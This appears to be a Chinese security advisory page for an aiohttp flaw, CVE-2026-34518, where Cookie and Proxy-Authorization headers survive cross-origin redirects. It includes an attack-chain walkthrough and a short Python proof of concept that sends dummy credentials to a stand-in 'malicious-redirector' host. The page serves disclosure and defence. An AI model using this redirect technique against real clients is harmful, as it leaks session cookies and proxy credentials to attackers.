CVE-2026-34518 CVSS 5.3 中危

CVE-2026-34518 aiohttp跨域重定向信息泄露漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34518

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

aiohttp

漏洞概述

aiohttp框架3.13.4之前版本存在安全漏洞。在处理跨域重定向请求时，程序仅删除了Authorization头，却未清除Cookie和Proxy-Authorization头，导致敏感凭据可能被发送至不受信任的第三方服务器。

技术细节

该漏洞源于aiohttp客户端在处理跨域重定向时对敏感HTTP头部的清理逻辑存在缺陷。根据安全规范，客户端在跟随重定向跳转到不同源时，必须丢弃所有敏感认证头部。但在3.13.4版本之前，aiohttp仅移除了Authorization头部，却错误地保留了Cookie和Proxy-Authorization头部。攻击者可诱导受害者向恶意服务器发起请求，该服务器返回指向攻击者控制域名的重定向响应。此时，aiohttp客户端会自动跟随跳转，并将原本发送给合法服务器的Cookie和代理认证凭据发送给攻击者，导致会话劫持或凭证泄露。

攻击链分析

STEP 1

步骤1

攻击者搭建恶意服务器，配置该服务器对特定请求返回302重定向响应，目标指向攻击者控制的数据收集服务器。

STEP 2

步骤2

攻击者诱导受害者使用存在漏洞的aiohttp客户端（版本<3.13.4）访问恶意服务器URL。

STEP 3

步骤3

受害者客户端发送请求，其中包含Cookie、Proxy-Authorization等敏感头部。

STEP 4

步骤4

恶意服务器响应重定向请求，aiohttp客户端自动跟随跳转到攻击者的数据收集服务器。

STEP 5

步骤5

由于漏洞，客户端在向新目标发起请求时保留了Cookie和Proxy-Authorization头，导致敏感信息泄露给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import asyncio
import aiohttp

# This PoC demonstrates a vulnerable client interacting with a malicious redirector.
# In a real scenario, 'http://malicious.com' would redirect to 'http://attacker-controlled.com'.

async def vulnerable_request():
    url = 'http://malicious-redirector.com/init'
    headers = {
        'Authorization': 'Bearer secret-token',
        'Cookie': 'sessionid=secret-session',
        'Proxy-Authorization': 'Basic proxy-creds'
    }
    
    async with aiohttp.ClientSession() as session:
        # In vulnerable versions, 'Cookie' and 'Proxy-Authorization' would be sent to the redirect target.
        async with session.get(url, headers=headers) as response:
            print(f"Status: {response.status}")
            print(f"Final URL: {response.url}")
            # The attacker's server logs would show the leaked headers.

if __name__ == '__main__':
    # asyncio.run(vulnerable_request()) # Uncomment to run
    pass

影响范围

aiohttp < 3.13.4

防御指南

临时缓解措施

若无法立即升级，建议在代码中禁用自动重定向（设置allow_redirects=False），并手动检查重定向目标的源，仅在安全的情况下手动构建新请求，确保跨域时不携带敏感头部。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表